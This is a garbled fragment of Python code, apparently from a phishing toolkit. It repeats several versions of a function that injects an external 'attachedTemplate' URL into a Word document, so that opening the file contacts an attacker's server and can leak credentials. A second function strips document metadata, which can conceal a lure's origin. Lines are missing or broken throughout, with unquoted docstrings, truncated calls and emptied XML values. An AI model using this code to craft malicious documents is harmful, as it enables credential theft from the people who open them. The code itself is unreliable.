def phishery_inject(input_file, document_urls, output_file=None):
    target_string = '<Relationship Id="{rid}" Type="" Target="{target_url}" TargetMode="External"/>'
    input_file = os.path.abspath(input_file)
    document_urls = document_urls.split()
    rids = []
    while len(rids) < len(document_urls):
        rid = 'rId' + str(random.randint(10000, 99999))
        if rid not in rids:

    settings = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\r\n'
    settings += '<Relationships xmlns="">'
    for rid, url in zip(rids, document_urls):
        settings += target_string.format(rid=rid, target_url=url)
    settings += '</Relationships>'

    patches = {}
    patches['word/_rels/settings.xml.rels'] = settings
    with zipfile.ZipFile(input_file, 'r') as zin:
        settings ='word/settings.xml')
    settings = settings.decode('utf-8')
    for rid in rids:
        settings = settings.replace(
            '/><w', "/><w:attachedTemplate r:id=\"{0}\"/><w".format(rid), 1)
    patches['word/settings.xml'] = settings
    archive.patch_zipfile(input_file, patches, output_file=output_file)
def phishery_inject(input_file, document_urls, output_file=None):
	target_string = '<Relationship Id="{rid}" Type="" Target="{target_url}" TargetMode="External"/>'
	input_file = os.path.abspath(input_file)
	document_urls = document_urls.split()
	rids = []
	while len(rids) < len(document_urls):
		rid = 'rId' + str(random.randint(10000, 99999))
		if rid not in rids:

	settings = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\r\n'
	settings += '<Relationships xmlns="">'
	for rid, url in zip(rids, document_urls):
		settings += target_string.format(rid=rid, target_url=url)
	settings += '</Relationships>'

	patches = {}
	patches['word/_rels/settings.xml.rels'] = settings
	with zipfile.ZipFile(input_file, 'r') as zin:
		settings ='word/settings.xml')
	settings = settings.decode('utf-8')
	for rid in rids:
		settings = settings.replace('/><w', "/><w:attachedTemplate r:id=\"{0}\"/><w".format(rid), 1)
	patches['word/settings.xml'] = settings
	archive.patch_zipfile(input_file, patches, output_file=output_file)
def remove_office_metadata(input_file, output_file=None):
	Remove all metadata from Microsoft Office 2007+ file types such as docx,
	pptx, and xlsx.
    input_file = os.path.abspath(input_file)
    patches = {}
    ns = {
        'dc': '',
        'dcterms': '',
        'dcmitype': '',
        'xsi': ''
    for prefix, uri in ns.items():
        ElementTree.register_namespace(prefix, uri)

    with zipfile.ZipFile(input_file, 'r') as zin:
        docprops_core ='docProps/core.xml')
    root = ElementTree.fromstring(docprops_core)
    docprops_core = ElementTree.tostring(root, 'utf-8')
    patches['docProps/core.xml'] = docprops_core
    archive.patch_zipfile(input_file, patches, output_file=output_file)
def phishery_inject(input_file, https_url, output_file=None):
	input_file = os.path.abspath(input_file)
	patches = {}
	rid = 'rId' + str(random.randint(10000, 99999))
	settings = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\r\n'
	settings += '<Relationships xmlns="">'
	settings += '<Relationship Id="{rid}" Type="" Target="{target_url}" TargetMode="External"/>'
	settings += '</Relationships>'
	settings = settings.format(rid=rid, target_url=https_url)
	patches['word/_rels/settings.xml.rels'] = settings
	with zipfile.ZipFile(input_file, 'r') as zin:
		settings ='word/settings.xml')
	settings = settings.decode('utf-8')
	settings = settings.replace('/><w', "/><w:attachedTemplate r:id=\"{0}\"/><w".format(rid), 1)
	patches['word/settings.xml'] = settings
	archive.patch_zipfile(input_file, patches, output_file=output_file)
def remove_office_metadata(input_file, output_file=None):
	Remove all metadata from Microsoft Office 2007+ file types such as docx,
	pptx, and xlsx.
	input_file = os.path.abspath(input_file)
	patches = {}
	ns = {
		'cp': '',
		'dc': '',
		'dcterms': '',
		'dcmitype': '',
		'xsi': ''
	for prefix, uri in ns.items():
		ElementTree.register_namespace(prefix, uri)

	with zipfile.ZipFile(input_file, 'r') as zin:
		docprops_core ='docProps/core.xml')
	root = ElementTree.fromstring(docprops_core)
	docprops_core = ElementTree.tostring(root, 'utf-8')
	patches['docProps/core.xml'] = docprops_core
	archive.patch_zipfile(input_file, patches, output_file=output_file)